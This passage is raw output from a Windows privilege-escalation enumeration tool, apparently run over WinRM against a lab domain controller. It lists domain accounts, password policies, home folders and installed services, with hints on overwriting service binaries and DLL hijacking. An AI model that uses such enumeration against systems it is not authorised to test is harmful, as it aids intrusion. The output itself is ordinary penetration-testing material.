WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/16/2025 8:15:35 PM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   hank
WINRM       172.16.55.128   5985   DC01                User Id                 :   1104
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 5:05:12 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   lookback-admin
WINRM       172.16.55.128   5985   DC01                User Id                 :   1105
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   10/19/2025 5:48:29 AM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 5:11:25 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   db-admin
WINRM       172.16.55.128   5985   DC01                User Id                 :   1106
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 8:51:59 PM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   16
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 5:15:44 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   Service_Maintainer
WINRM       172.16.55.128   5985   DC01                User Id                 :   1107
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 6:27:26 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   IT-SEC-admin
WINRM       172.16.55.128   5985   DC01                User Id                 :   1110
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 10:37:35 PM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 7:11:48 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   IT-admin
WINRM       172.16.55.128   5985   DC01                User Id                 :   1111
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 11:38:55 PM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   3
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   4/10/2026 11:35:00 PM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   administrator
WINRM       172.16.55.128   5985   DC01                User Id                 :   1112
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 11:08:39 PM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   4
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   4/10/2026 10:42:35 PM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   IT-email-admin
WINRM       172.16.55.128   5985   DC01                User Id                 :   1113
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 7:20:21 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ RDP Sessions
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Ever logged users
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied 
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Home folders found
WINRM       172.16.55.128   5985   DC01                 C:\Users\Administrator
WINRM       172.16.55.128   5985   DC01                 C:\Users\administrator .LOOKBACK : administrator  [Allow: AllAccess]                                                                                    
WINRM       172.16.55.128   5985   DC01                 C:\Users\All Users
WINRM       172.16.55.128   5985   DC01                 C:\Users\db-admin
WINRM       172.16.55.128   5985   DC01                 C:\Users\Default
WINRM       172.16.55.128   5985   DC01                 C:\Users\Default User
WINRM       172.16.55.128   5985   DC01                 C:\Users\Public
WINRM       172.16.55.128   5985   DC01                 C:\Users\Service_Maintainer
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials
WINRM       172.16.55.128   5985   DC01                 Some AutoLogon credentials were found
WINRM       172.16.55.128   5985   DC01                 DefaultDomainName             :  LOOKBACK
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Password Policies
WINRM       172.16.55.128   5985   DC01             È Check for a possible brute-force 
WINRM       172.16.55.128   5985   DC01                 Domain: Builtin
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-32
WINRM       172.16.55.128   5985   DC01                 MaxPasswordAge: 42.22:47:31.7437440
WINRM       172.16.55.128   5985   DC01                 MinPasswordAge: 00:00:00
WINRM       172.16.55.128   5985   DC01                 MinPasswordLength: 0
WINRM       172.16.55.128   5985   DC01                 PasswordHistoryLength: 0
WINRM       172.16.55.128   5985   DC01                 PasswordProperties: 0
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Domain: LOOKBACK
WINRM       172.16.55.128   5985   DC01                 SID: S-1-5-21-3830242231-3868280746-2763890440
WINRM       172.16.55.128   5985   DC01                 MaxPasswordAge: 42.00:00:00
WINRM       172.16.55.128   5985   DC01                 MinPasswordAge: 1.00:00:00
WINRM       172.16.55.128   5985   DC01                 MinPasswordLength: 0
WINRM       172.16.55.128   5985   DC01                 PasswordHistoryLength: 24
WINRM       172.16.55.128   5985   DC01                 PasswordProperties: 0
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Print Logon Sessions
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Processes Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                           
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Interesting Processes -non Microsoft-
WINRM       172.16.55.128   5985   DC01             È Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#running-processes                                                
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Vulnerable Leaked Handlers
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#leaked-handlers                                          
WINRM       172.16.55.128   5985   DC01             È Getting Leaked Handlers, it might take some time...                                                                                                       
WINRM       172.16.55.128   5985   DC01             [#########-]  99% |                       Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Services Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                            
WINRM       172.16.55.128   5985   DC01               [X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Interesting Services -non Microsoft-
WINRM       172.16.55.128   5985   DC01             È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services                                                 
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied 
WINRM       172.16.55.128   5985   DC01                 @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot                               
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot                                                                                       
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(Marvell Semiconductor Inc. - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot                                                                               
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(Marvell Semiconductor Inc. - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot                                                                                  
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\Windows\System32\drivers\cht4vx64.sys] - System                                                              
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @nete1g3e.inf,%e1000.Service.DispName%;Intel(R) PRO/1000 NDIS 6 Adapter Driver(Intel Corporation - @nete1g3e.inf,%e1000.Service.DispName%;Intel(R) PRO/1000 NDIS 6 Adapter Driver)[C:\Windows\System32\drivers\E1G6032E.sys] - System                           
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\Windows\System32\drivers\e1i68x64.sys] - System                                                                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(Marvell Semiconductor Inc. - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot                                                        
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @netevbd0a.inf,%vbd_srv_desc%;QLogic Legacy Ethernet Adapter VBD(QLogic Corporation - @netevbd0a.inf,%vbd_srv_desc%;QLogic Legacy Ethernet Adapter VBD)[System32\drivers\evbd0a.sys] - Boot                                                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_GPIO.sys] - System               
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_I2C.sys] - System                      
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\drivers\iaStorAVC.sys] - Boot                                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot                                                                 
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\Windows\System32\drivers\ibbus.sys] - System                                           
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\Windows\System32\drivers\mlx4_bus.sys] - System                                                        
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\Windows\System32\drivers\ndfltr.sys] - System                                                                                  
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 NDKPerf Driver(NDKPerf Driver)[system32\drivers\NDKPerf.sys] - System                                                                                   
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @pvscsii.inf,%pvscsi.DiskName%;pvscsi Storage Controller Driver(VMware, Inc. - @pvscsii.inf,%pvscsi.DiskName%;pvscsi Storage Controller Driver)[System32\drivers\pvscsii.sys] - Boot                                                                            
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Marvell Semiconductor Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\drivers\qevbda.sys] - Boot                                                                         
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Marvell Semiconductor Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\drivers\qefcoe.sys] - Boot                                                                                               
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(Marvell Semiconductor Inc. - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\drivers\qeois.sys] - Boot                                                                                          
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(Marvell Semiconductor Inc. - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\drivers\ql2300i.sys] - Boot              
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot                                                       
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot                                  
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 SQL Server Agent (MSSQLSERVER)(SQL Server Agent (MSSQLSERVER))["C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE" -i MSSQLSERVER] - System                                                                                     
WINRM       172.16.55.128   5985   DC01                 Executes jobs, monitors SQL Server, fires alerts, and allows automation of some administrative tasks.                                                   
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Manual                                          
WINRM       172.16.55.128   5985   DC01                 Agent to hold private keys used for public key authentication.                                                                                          
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @Usb4HostRouter.inf,%Usb4HostRouter.SVCDESC%;USB4 Host Router Service(@Usb4HostRouter.inf,%Usb4HostRouter.SVCDESC%;USB4 Host Router Service)[C:\Windows\System32\drivers\Usb4HostRouter.sys] - System                                                           
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\Windows\System32\drivers\USBSTOR.SYS] - System
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\Windows\System32\drivers\USBXHCI.SYS] - System                                                        
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Autoload                                                                              
WINRM       172.16.55.128   5985   DC01                 Alias Manager and Ticket Service
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service(VMware, Inc. - @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service)[C:\Windows\system32\vm3dservice.exe] - Autoload                                                                   
WINRM       172.16.55.128   5985   DC01                 @oem8.inf,%VM3DSERVICE_DESCRIPTION%;Helps VMware SVGA driver by collecting and conveying user mode information                                          
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @oem2.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(Broadcom Inc. - @oem2.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot                                                                                  
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 VMware Host Guest Client Redirector(VMware, Inc. - VMware Host Guest Client Redirector)[system32\DRIVERS\vmhgfs.sys] - System                           
WINRM       172.16.55.128   5985   DC01                 Implements the VMware HGFS protocol. This protocol provides connectivity to host files provided by the HGFS server.                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\Windows\system32\DRIVERS\vmmemctl.sys] - Autoload                                        
WINRM       172.16.55.128   5985   DC01                 Driver to provide enhanced memory management of this virtual machine.                                                                                   
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\Windows\System32\drivers\vmmouse.sys] - System                                                                                         
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 VMware Physical Disk Helper(VMware, Inc. - VMware Physical Disk Helper)[C:\Windows\system32\DRIVERS\vmrawdsk.sys] - System                              
WINRM       172.16.55.128   5985   DC01                 VMware Physical Disk Helper
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 VMware Tools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Autoload                                               
WINRM       172.16.55.128   5985   DC01                 Provides support for synchronizing objects between the host and guest operating systems.                                                                
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\Windows\System32\drivers\vmusbmouse.sys] - System                                                                        
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[system32\DRIVERS\vsock.sys] - Boot                                                                              
WINRM       172.16.55.128   5985   DC01                 vSockets Driver
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot                                  
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @%SystemRoot%\System32\drivers\vwifibus.sys,-257(@%SystemRoot%\System32\drivers\vwifibus.sys,-257)[C:\Windows\System32\drivers\vwifibus.sys] - System   
WINRM       172.16.55.128   5985   DC01                 @%SystemRoot%\System32\drivers\vwifibus.sys,-258
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\Windows\System32\drivers\winmad.sys] - System
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\Windows\System32\drivers\WinUSB.SYS] - System                 
WINRM       172.16.55.128   5985   DC01                 @winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices                                                                                             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\Windows\System32\drivers\winverbs.sys] - System                                                                                      
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Modifiable Services
WINRM       172.16.55.128   5985   DC01             È Check if you can modify any service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services              
WINRM       172.16.55.128   5985   DC01                 You cannot modify any service
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking if you can modify any service registry                                                                                                 
